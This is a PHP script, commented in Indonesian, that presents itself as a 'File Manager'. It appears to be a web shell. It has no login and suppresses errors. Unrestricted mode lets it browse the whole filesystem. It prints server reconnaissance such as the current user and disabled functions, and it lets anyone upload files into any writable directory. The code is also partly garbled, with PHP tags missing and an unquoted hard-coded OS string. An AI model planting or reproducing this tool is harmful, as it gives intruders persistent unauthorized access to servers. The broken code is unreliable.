error_reporting(0);
ini_set('display_errors', 0);

// === KONFIGURASI KEAMANAN ===
define('BASE_DIR', __DIR__); // default sandbox
define('ALLOW_UNRESTRICTED', true); // true agar bisa akses root & direktori lain

// === UTIL ===
function normalise_slashes($p) {
return str_replace(['\\','/'], DIRECTORY_SEPARATOR, $p);
}

function rel_for_url($p) {
return str_replace(DIRECTORY_SEPARATOR, '/', $p);
}

function resolve_directory($requested) {
$baseReal = realpath(BASE_DIR);
$requested = (string)$requested;
$requested = trim($requested, " \t\n\r\0\x0B"); // jangan trim slash

if ($requested === '') return $baseReal;

if (ALLOW_UNRESTRICTED) {
$real = realpath($requested);
return $real ? $real : $requested;
} else {
$real = realpath($baseReal . DIRECTORY_SEPARATOR . $requested);
if ($real && strpos($real, $baseReal) === 0) return $real;
return $baseReal;
}
}

// === INIT ===
$directory = isset($_GET['dir']) ? resolve_directory($_GET['dir']) : BASE_DIR;
if (!is_dir($directory)) $directory = BASE_DIR;

// === SERVER INFO ===
$server_info = [
"OS" => Linux Server 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC x86_64,
"Server IP" => $_SERVER['SERVER_ADDR'] ?? gethostbyname(gethostname()),
"Client IP" => $_SERVER['REMOTE_ADDR'] ?? "Unknown",
"PHP Version" => phpversion(),
"Server Software" => $_SERVER['SERVER_SOFTWARE'] ?? "Unknown",
"Current User" => get_current_user(),
"Disable Functions" => ini_get("disable_functions") ?: "None",
"Memory Limit" => ini_get("memory_limit"),
"Max Upload" => ini_get("upload_max_filesize"),
"Post Max Size" => ini_get("post_max_size"),
];

// === PESAN NOTIF ===
$messages = [];

// === UPLOAD HANDLER ===
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['action']) && $_POST['action'] === 'upload' && isset($_FILES['files'])) {
if (!is_dir($directory) || !is_writable($directory)) {
$messages[] = ['err' => "Direktori tidak writable: " . htmlspecialchars($directory)];
} else {
$files = $_FILES['files'];
$count = is_array($files['name']) ? count($files['name']) : 1;

for ($i=0; $i<$count; $i++) {
$name = is_array($files['name']) ? $files['name'][$i] : $files['name'];
$tmp = is_array($files['tmp_name']) ? $files['tmp_name'][$i] : $files['tmp_name'];
$err = is_array($files['error']) ? $files['error'][$i] : $files['error'];
$orig = basename($name);
$safe = preg_replace('/[^A-Za-z0-9_\-\. ]/', '_', $orig);

if ($err !== UPLOAD_ERR_OK) { $messages[] = ['err'=>"Gagal upload $orig (err:$err)"]; continue; }
if (!is_uploaded_file($tmp)) { $messages[] = ['err'=>"File tmp hilang: $orig"]; continue; }

$dest = rtrim($directory,DIRECTORY_SEPARATOR).DIRECTORY_SEPARATOR.$safe;
if (file_exists($dest)) $dest = rtrim($directory,DIRECTORY_SEPARATOR).DIRECTORY_SEPARATOR.uniqid().'_'.$safe;

if (move_uploaded_file($tmp, $dest)) $messages[] = ['ok'=>"Uploaded: $safe"];
else $messages[] = ['err'=>"Gagal memindahkan $orig ke $dest"];
}
}
}

// === BACA ISI FOLDER ===
$files = @scandir($directory) ?: [];
$files = array_diff($files, ['.','..']);
$dirs=[]; $regular=[];
foreach($files as $f){
$p=$directory.DIRECTORY_SEPARATOR.$f;
if(is_dir($p)) $dirs[]=$f; else $regular[]=$f;
}
$sorted = array_merge($dirs,$regular);

// === BREADCRUMB ===
$parts = explode(DIRECTORY_SEPARATOR, $directory);
$crumbs = [];
$path_accum = '';
foreach ($parts as $part) {
if ($part === '') { $path_accum = DIRECTORY_SEPARATOR; $crumbs[] = ['name'=>'/', 'path'=>$path_accum]; continue; }
$path_accum = rtrim($path_accum,DIRECTORY_SEPARATOR).DIRECTORY_SEPARATOR.$part;
$crumbs[] = ['name'=>$part, 'path'=>$path_accum];
}

<!DOCTYPE html>


<meta charset="UTF-8">
File Manager<title>File Manager</title>
<style>
body{font-family:monospace;background:#111;color:#eee;}
a{color:#1abc9c;text-decoration:none;}
a:hover{text-decoration:underline;}
.box{background:#222;padding:6px;margin:4px 0;border-radius:4px;}
.msg-ok{background:#2d7;color:#fff;padding:4px;margin:3px 0;}
.msg-err{background:#c33;color:#fff;padding:4px;margin:3px 0;}
.breadcrumb a{color:#f39c12;margin-right:5px;}
</style>



Server Info


<table border="1" cellpadding="4" cellspacing="0">
foreach($server_info as $k=>$v):
echo htmlspecialchars($k); echo htmlspecialchars($v);
endforeach;


Directory:


<div class="breadcrumb">
foreach($crumbs as $c):
<a href="?dir= echo urlencode($c['path']);"> echo htmlspecialchars($c['name']);</a> /
endforeach;
</div>

foreach($messages as $m):
<div class=" echo isset($m['ok'])?'msg-ok':'msg-err';">
echo htmlspecialchars(reset($m));
</div>
endforeach;

<ul>
foreach($sorted as $f):
<li>
if(is_dir($directory.DIRECTORY_SEPARATOR.$f)):
📁 <a href="?dir= echo urlencode($directory.DIRECTORY_SEPARATOR.$f);"> echo $f;</a>
else:
📄 echo $f;
endif;
</li>
endforeach;
</ul>

<div class="box">

Upload Files





<button type="submit">Upload</button>

</div>